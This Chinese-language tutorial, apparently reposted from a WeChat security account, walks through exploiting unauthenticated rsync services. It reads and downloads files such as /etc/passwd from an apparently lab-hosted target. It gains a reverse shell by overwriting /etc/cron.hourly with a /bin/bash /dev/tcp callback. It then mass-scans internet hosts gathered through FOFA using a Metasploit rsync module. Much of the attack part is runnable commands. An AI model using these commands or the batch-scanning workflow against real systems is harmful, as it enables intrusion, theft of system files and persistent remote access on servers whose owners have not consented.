什么是服务?
在服务器操作系统安装的时候,会装了比较多的服务。如我们在安装使用mysq数据库时,默认情况下就会开启mysql服务和服务默认端口3306。这些服务就可能产生漏洞。
服务漏洞测试流程:
协议:
FTP:文件传输协议,默认端口21
RDP:Windows远程桌面协议,默认端口3389
SSH:Linux安全外壳协议,默认端口22
案例演示:rsync-common 未授权访问
rsync是什么?
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口。
漏洞产生原因:
目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件
使用vulfucos靶场开启漏洞环境
在自己linux服务器输入:rsync rsync://目标ip:端口/判断漏洞是否存在
如果返回模块名列表等内容,说明漏洞存在
漏洞存在,可以读取文件:rsync rsync://123.58.224.8:58725/src/tmp/
还可以进行下载和上传操作:
下载文件:rsync rsync://123.58.224.8:58725/src/etc/passwd ./
上传文件:rsync-avpasswdrsync://123.58.224.8:58725/src/tmp/passwd
还可以尝试获取shell:
执行命令:rsync rsync://123.58.224.8:20700/src/etc/crontab /root/cc.txt查看crontab中的内容,发现有一个每17分钟执行一次/etc/cron.hourly文件的定时任务
于是创建一个带有反弹shell命令的文件进行上传,将/etc/cron.hourly文件的内容覆盖
命令:
touch shell
vim shell写入内容:/bin/bash -i >& /dev/tcp/接收shell的服务器地址/5566 0>&1
chmod +x shell
上传shell文件覆盖/etc/cron.hourly文件内容
命令:rsync-av shell rsync://123.58.224.8:22700/src/etc/cron.hourly
服务器监听设置的5566端口,等待定时任务执行接收反弹shell
案例演示:批量扫描rsync漏洞---Fofaviewer配合Msf
工具Fofaviewer:
利用强大的互联网搜索引擎FoFa,将众多常用的API封装到简洁的UI中,让网络安全专业人士更容易在目标网站上寻找漏洞。
下载地址:https://github.com/wgpsec/fofa_viewer
Msfconsole:
msfconsole是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台。通过msfconsole,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。
Centos系统Msf一键安装命令:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb >msfinstall &&chmod755msfinstall &&./msfinstall
java运行工具Fofaviewer,配置fofa账号和key,
输入查询条件(漏洞特征),点击查询即可获取目标
将查询到的目标数据导出保存,将ip保存到另一个rsync.txt文件中
安装好msf,输入命令:msfconsole展示工具模块
输入命令:
use auxiliary/scanner/rsync/modules_list进入rsync漏洞扫描模块
show options 查看模块配置方法
set rhosts file:/root/rsync.txt批量扫描,指定字典
set threads 10配置线程
show options再次查看配置情况
模块配置完成,输入命令:run启动扫描。【+】代表有漏洞,【*】没有
挑选一个验证是否存在漏洞
成功列出模块名列表,漏洞存在
原文始发于微信公众号(小黑子安全):应用协议-Rsync+协议+漏洞批扫
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论